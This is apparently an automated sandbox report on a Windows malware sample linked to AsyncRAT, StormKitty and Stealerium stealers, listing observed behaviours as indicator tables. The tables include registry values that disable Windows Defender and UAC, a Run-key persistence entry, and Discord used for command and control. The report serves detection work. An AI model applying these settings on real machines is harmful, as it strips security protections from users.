Analysis Overview
SHA256
e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944
Threat Level: Known bad
The file e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944 was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
UAC bypass
Modifies Windows Defender Real-time Protection settings
Stealerium
StormKitty payload
AsyncRat
StormKitty
Async RAT payload
Executes dropped EXE
Windows security modification
Checks computer location settings
Reads user/profile data of web browsers
Legitimate hosting services abused for malware hosting/C2
Checks whether UAC is enabled
Checks installed software on the system
Looks up geolocation information via web service
Adds Run key to start application
Looks up external IP address via web service
Accesses Microsoft Outlook profiles
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
System policy modification
Suspicious use of SetWindowsHookEx
Modifies data under HKEY_USERS
Checks processor information in registry
outlook_win_path
outlook_office_path
Suspicious behavior: AddClipboardFormatListener
Runs net.exe
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-23 11:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-23 11:06
Reported
2024-05-23 11:08
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
AsyncRat
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Stealerium
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4552 created 1880 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\servicing\TrustedInstaller.exe |
| PID 3404 created 1880 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\servicing\TrustedInstaller.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\e3f245020bcf6beaca39b8cc9eb06b3db7f209356e765f41d8306ad56735e944.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Infected.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Infected.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourAppName = "C:\\Users\\Admin\\AppData\\Local\\Temp\\WinDefend.exe" | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | api64.ipify.org | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\WinDefend.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Infected.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\whoami.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
Suspicious use of WriteProcessMemory
System policy modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" | C:\Users\Admin\AppData\Roaming\Loaader.exe | N/A |
Uses Task Scheduler COM API
outlook_office_path
| Description | Indicator | Process | Target |
